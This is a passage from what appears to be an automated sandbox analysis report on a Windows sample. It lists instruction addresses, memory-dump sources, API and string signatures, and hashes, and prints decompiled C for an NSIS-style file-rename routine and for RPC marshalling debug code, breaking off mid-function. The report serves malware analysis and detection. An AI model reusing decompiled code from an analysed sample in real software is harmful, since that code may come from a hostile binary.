                                                                                                0x6eda915e
                                                                                                0x6eda9162
                                                                                                0x6eda9166
                                                                                                0x6eda9171
                                                                                                0x6eda9174
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda8feb
                                                                                                0x6eda8feb
                                                                                                0x6eda8ff1
                                                                                                0x6eda8ff5
                                                                                                0x6eda8ff8
                                                                                                0x6eda8ff9
                                                                                                0x6eda8ffc
                                                                                                0x6eda8ffe
                                                                                                0x6eda8fff
                                                                                                0x6eda9004
                                                                                                0x6eda9009
                                                                                                0x6eda900c
                                                                                                0x6eda9015
                                                                                                0x6eda9017
                                                                                                0x6eda901c
                                                                                                0x6eda901c
                                                                                                0x6eda9022
                                                                                                0x6eda9024
                                                                                                0x6eda902c
                                                                                                0x6eda9034
                                                                                                0x6eda9037
                                                                                                0x6eda903a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda917c
                                                                                                0x6eda917c
                                                                                                0x6eda9183
                                                                                                0x6eda9186
                                                                                                0x6eda9187
                                                                                                0x6eda918a
                                                                                                0x6eda918c
                                                                                                0x6eda918d
                                                                                                0x6eda9192
                                                                                                0x6eda9197
                                                                                                0x6eda919a
                                                                                                0x6eda919d
                                                                                                0x6eda91a0
                                                                                                0x6eda91a1
                                                                                                0x6eda91a6
                                                                                                0x6eda91ab
                                                                                                0x6eda91ae
                                                                                                0x6eda91b1
                                                                                                0x6eda91b7
                                                                                                0x6eda91b9
                                                                                                0x6eda91bc
                                                                                                0x6eda91bc
                                                                                                0x6eda91bf
                                                                                                0x6eda91c2
                                                                                                0x6eda91c8
                                                                                                0x6eda91cc
                                                                                                0x6eda91cf
                                                                                                0x6eda91d3
                                                                                                0x6eda91d8
                                                                                                0x6eda91db
                                                                                                0x6eda91de
                                                                                                0x6eda91e1
                                                                                                0x6eda91e4
                                                                                                0x6eda91eb
                                                                                                0x6eda920c
                                                                                                0x6eda920f
                                                                                                0x6eda9215
                                                                                                0x6eda9219
                                                                                                0x6eda921d
                                                                                                0x6eda9222
                                                                                                0x6eda91ed
                                                                                                0x6eda91ed
                                                                                                0x6eda91f0
                                                                                                0x6eda91f3
                                                                                                0x6eda91f6
                                                                                                0x6eda91f9
                                                                                                0x6eda91fc
                                                                                                0x6eda9203
                                                                                                0x6eda9203
                                                                                                0x6eda9225
                                                                                                0x6eda9229
                                                                                                0x6eda922c
                                                                                                0x6eda922f
                                                                                                0x6eda9233
                                                                                                0x6eda9237
                                                                                                0x6eda9243
                                                                                                0x6eda92d8
                                                                                                0x6eda92d8
                                                                                                0x6eda92db
                                                                                                0x6eda92de
                                                                                                0x6eda92df
                                                                                                0x6eda92e4
                                                                                                0x6eda92e9
                                                                                                0x6eda92ec
                                                                                                0x6eda92ef
                                                                                                0x6eda92f5
                                                                                                0x6eda9302
                                                                                                0x6eda9305
                                                                                                0x6eda9308
                                                                                                0x6eda92f7
                                                                                                0x6eda92fa
                                                                                                0x6eda92fd
                                                                                                0x6eda92fd
                                                                                                0x6eda930e
                                                                                                0x6eda9311
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda924c
                                                                                                0x6eda924f
                                                                                                0x6eda9250
                                                                                                0x6eda9253
                                                                                                0x6eda9255
                                                                                                0x6eda925b
                                                                                                0x6eda925e
                                                                                                0x6eda925f
                                                                                                0x6eda9264
                                                                                                0x6eda9269
                                                                                                0x6eda926c
                                                                                                0x6eda926f
                                                                                                0x6eda9271
                                                                                                0x6eda9274
                                                                                                0x6eda9277
                                                                                                0x6eda927a
                                                                                                0x6eda9280
                                                                                                0x6eda9282
                                                                                                0x6eda9285
                                                                                                0x6eda9287
                                                                                                0x6eda928a
                                                                                                0x6eda928d
                                                                                                0x6eda9290
                                                                                                0x6eda9296
                                                                                                0x6eda9298
                                                                                                0x6eda9299
                                                                                                0x6eda929e
                                                                                                0x6eda92a3
                                                                                                0x6eda92a3
                                                                                                0x6eda92a6
                                                                                                0x6eda92a6
                                                                                                0x6eda92aa
                                                                                                0x6eda92ad
                                                                                                0x6eda92b0
                                                                                                0x6eda92b3
                                                                                                0x6eda92b6
                                                                                                0x6eda92b9
                                                                                                0x6eda92bc
                                                                                                0x6eda92bf
                                                                                                0x6eda92c2
                                                                                                0x6eda92c8
                                                                                                0x6eda92cc
                                                                                                0x6eda92d0
                                                                                                0x6eda92d5
                                                                                                0x00000000
                                                                                                0x6eda92c8
                                                                                                0x00000000
                                                                                                0x6eda9319
                                                                                                0x6eda931b
                                                                                                0x6eda931f
                                                                                                0x6eda9323
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9330
                                                                                                0x6eda9332
                                                                                                0x6eda933a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9347
                                                                                                0x6eda9349
                                                                                                0x6eda934d
                                                                                                0x6eda9351
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda935e
                                                                                                0x6eda935e
                                                                                                0x6eda9361
                                                                                                0x6eda9364
                                                                                                0x6eda9367
                                                                                                0x6eda936b
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9373
                                                                                                0x6eda9378
                                                                                                0x6eda937b
                                                                                                0x6eda9382
                                                                                                0x6eda9385
                                                                                                0x6eda938b
                                                                                                0x6eda938e
                                                                                                0x6eda9391
                                                                                                0x6eda9397
                                                                                                0x6eda939a
                                                                                                0x6eda939d
                                                                                                0x6eda93a1
                                                                                                0x6eda93ad
                                                                                                0x6eda93b0
                                                                                                0x6eda93b3
                                                                                                0x6eda93b4
                                                                                                0x6eda93b7
                                                                                                0x6eda93b8
                                                                                                0x6eda93bd
                                                                                                0x6eda93c2
                                                                                                0x6eda93c5
                                                                                                0x6eda93c8
                                                                                                0x6eda93cb
                                                                                                0x6eda93ce
                                                                                                0x6eda93d5
                                                                                                0x6eda93dc
                                                                                                0x6eda940d
                                                                                                0x6eda9410
                                                                                                0x6eda9413
                                                                                                0x6eda9414
                                                                                                0x6eda9419
                                                                                                0x6eda941e
                                                                                                0x6eda93de
                                                                                                0x6eda93de
                                                                                                0x6eda93e1
                                                                                                0x6eda93e7
                                                                                                0x6eda93fc
                                                                                                0x6eda93ff
                                                                                                0x6eda9400
                                                                                                0x6eda9403
                                                                                                0x6eda9404
                                                                                                0x6eda9407
                                                                                                0x6eda9408
                                                                                                0x6eda93e9
                                                                                                0x6eda93e9
                                                                                                0x6eda93ec
                                                                                                0x6eda93ed
                                                                                                0x6eda93f0
                                                                                                0x6eda93f2
                                                                                                0x6eda93f3
                                                                                                0x6eda93f6
                                                                                                0x6eda93f7
                                                                                                0x6eda93f7
                                                                                                0x6eda940b
                                                                                                0x6eda9421
                                                                                                0x6eda9424
                                                                                                0x6eda9427
                                                                                                0x6eda942d
                                                                                                0x6eda9430
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9079
                                                                                                0x6eda9079
                                                                                                0x6eda907c
                                                                                                0x6eda907e
                                                                                                0x6eda9081
                                                                                                0x6eda9084
                                                                                                0x6eda9085
                                                                                                0x6eda9088
                                                                                                0x6eda908a
                                                                                                0x6eda908b
                                                                                                0x6eda9090
                                                                                                0x6eda9095
                                                                                                0x6eda909a
                                                                                                0x6eda909e
                                                                                                0x6eda90aa
                                                                                                0x6eda90ad
                                                                                                0x6eda90b0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8f74
                                                                                                0x6eda9462
                                                                                                0x6eda9462
                                                                                                0x6eda944e

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA901C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p
                                                                                                • API String ID: 3997070919-1788898343
                                                                                                • Opcode ID: 0fbe82e4cd4381bf12e82c7ab4edd2e523962862b5af9cafdd420c3ab85c49ca
                                                                                                • Instruction ID: 320f1a9135b48f16c22392e89c0c6a9da22f787578cca490c9a613452bffa0a8
                                                                                                • Opcode Fuzzy Hash: 0fbe82e4cd4381bf12e82c7ab4edd2e523962862b5af9cafdd420c3ab85c49ca
                                                                                                • Instruction Fuzzy Hash: 30C14CB9A00109AFCB04CF98D890EAA7B76EF89354F14C518FA194F345E731EB51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAB220, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 254COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F4), ref: 6EDAB2E5
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAB485
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p,%p)$NULL ref pointer is not allowed$buffer overflow %d bytes$buffer=%d/%d$calling marshaller for type 0x%x$deref => %p$no marshaller for data type=%02x$type=0x%x, attr=$unhandled ptr type=%02x$writing 0x%08x to buffer$writing 0x%08x to buffer
                                                                                                • API String ID: 3997070919-1660405780
                                                                                                • Opcode ID: 0ff7522f63dbc8d8d04eb5eb07b7cf4b67a7a45af825e81f6fc776535811c331
                                                                                                • Instruction ID: 38d53aa75f8936b577beb00ba3d3b952bf2a8c88ed32d994207809642bac6c8e
                                                                                                • Opcode Fuzzy Hash: 0ff7522f63dbc8d8d04eb5eb07b7cf4b67a7a45af825e81f6fc776535811c331
                                                                                                • Instruction Fuzzy Hash: 30B19DB590014AEFDB04DF98C890ABE7BB2EF89305F1481A9E9455B385D335EB41CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405679, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E00405679() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405C49(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ebf0 =  *0x42ebf0 + 1;
						return _t20;
					}
				}
				 *0x42c168 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
						_t18 =  *0x42eb70; // 0x5ff628
						_t56 = _t55 + 0x10;
						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405577(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405577(_t26 + 0xa, 0x409328);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E0040592B(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405602(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                                                0x0040567f
                                                                                                0x00405686
                                                                                                0x0040568a
                                                                                                0x00405693
                                                                                                0x00405697
                                                                                                0x004057d6
                                                                                                0x004057d6
                                                                                                0x00000000
                                                                                                0x004057d6
                                                                                                0x00405697
                                                                                                0x004056a3
                                                                                                0x004056b9
                                                                                                0x004056e1
                                                                                                0x004056ec
                                                                                                0x004056f0
                                                                                                0x00405710
                                                                                                0x00405712
                                                                                                0x00405717
                                                                                                0x00405721
                                                                                                0x0040572e
                                                                                                0x00405733
                                                                                                0x00405738
                                                                                                0x0040573c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040574b
                                                                                                0x0040574d
                                                                                                0x0040575a
                                                                                                0x0040575e
                                                                                                0x004057cf
                                                                                                0x004057d0
                                                                                                0x00000000
                                                                                                0x0040577a
                                                                                                0x00405787
                                                                                                0x004057ec
                                                                                                0x004057f3
                                                                                                0x0040579a
                                                                                                0x0040579a
                                                                                                0x0040579c
                                                                                                0x004057a5
                                                                                                0x004057b0
                                                                                                0x004057c2
                                                                                                0x004057c9
                                                                                                0x00000000
                                                                                                0x004057c9
                                                                                                0x004057f5
                                                                                                0x004057f6
                                                                                                0x004057fb
                                                                                                0x004057fd
                                                                                                0x0040580a
                                                                                                0x0040580a
                                                                                                0x0040580e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004057ff
                                                                                                0x004057ff
                                                                                                0x00405802
                                                                                                0x00405805
                                                                                                0x00405806
                                                                                                0x00000000
                                                                                                0x004057ff
                                                                                                0x00405792
                                                                                                0x00405797
                                                                                                0x00000000
                                                                                                0x00405797
                                                                                                0x0040575e
                                                                                                0x004056bb
                                                                                                0x004056c6
                                                                                                0x004056cf
                                                                                                0x004056d3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004056d3
                                                                                                0x004057e0

                                                                                                APIs
                                                                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                                                                                                • GetShortPathNameA.KERNEL32(?,0042C168,00000400), ref: 004056CF
                                                                                                • GetShortPathNameA.KERNEL32(00000000,0042BBE0,00000400), ref: 004056EC
                                                                                                • wsprintfA.USER32 ref: 0040570A
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                                                                                                • GlobalFree.KERNEL32 ref: 004057C9
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                                                                                                  • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                                  • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                • String ID: %s=%s$[Rename]
                                                                                                • API String ID: 3772915668-1727408572
                                                                                                • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                                • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                                                                                • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                                • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA9560, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 325COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p$unhandled format %d
                                                                                                • API String ID: 4056999889-3276087146
                                                                                                • Opcode ID: 7b4a0965bcc19093ea8ae4677bec0b570856f6aae5612e503e99510260bd8bbe
                                                                                                • Instruction ID: e9b245f69b1332c98461de5335039f2d91d858c50603febdaca5236b23304386
                                                                                                • Opcode Fuzzy Hash: 7b4a0965bcc19093ea8ae4677bec0b570856f6aae5612e503e99510260bd8bbe
                                                                                                • Instruction Fuzzy Hash: 58D13BB5A00109AFCB04CF99E890EAA7BB5AF89314F04C519FE594F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA96E7, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 320COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA96E7(void* __eflags) {
				void* _t220;
				void* _t222;
				void* _t224;

				L0:
				while(1) {
					L0:
					E6EDAAFA0( *((intOrPtr*)(_t220 + 8)), _t220 - 0x28, 4);
					 *( *(_t220 + 0xc)) =  *(_t220 - 0x28);
					0x6eda0000("uint3264=%ld => %p\n",  *( *(_t220 + 0xc)),  *(_t220 + 0xc));
					_t224 = _t222 + 0x18;
					 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[2]);
					while(1) {
						L47:
						 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
						L1:
						while(( *( *(_t220 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t220 - 0xc) =  *( *(_t220 + 0x10)) & 0x000000ff;
							 *(_t220 - 0xc) =  *(_t220 - 0xc) - 1;
							if( *(_t220 - 0xc) > 0xb8) {
								L46:
								0x6eda0000("unhandled format %d\n",  *( *(_t220 + 0x10)) & 0x000000ff);
								_t224 = _t224 + 8;
								while(1) {
									L47:
									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t16 =  *(_t220 - 0xc) + 0x6eda9b24; // 0xcccccc0f
							switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
								case 0:
									L4:
									E6EDAAFA0( *((intOrPtr*)(_t220 + 8)),  *(_t220 + 0xc), 1);
									_push( *(_t220 + 0xc));
									_push( *( *(_t220 + 0xc)) & 0x0000ffff);
									_push("byte=%d => %p\n");
									0x6eda0000();
									_t224 = _t224 + 0x18;
									 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[0]);
									L47:
									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L11:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [eax]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L12:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__edx + 4);
									_push(__eax);
									__ecx =  *__edx;
									_push(__ecx);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L13:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [eax]");
									asm("movsd [esp], xmm0");
									_push("double=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp - 4) & 0x0000ffff;
									__edx =  *(__ebp + 0xc);
									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L14:
									 *(__ebp - 0x1c) = 0;
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									_push("pointer => %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__edx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(__ecx != 0x11) {
										 *(__ebp + 8) =  *(__ebp + 8) + 4;
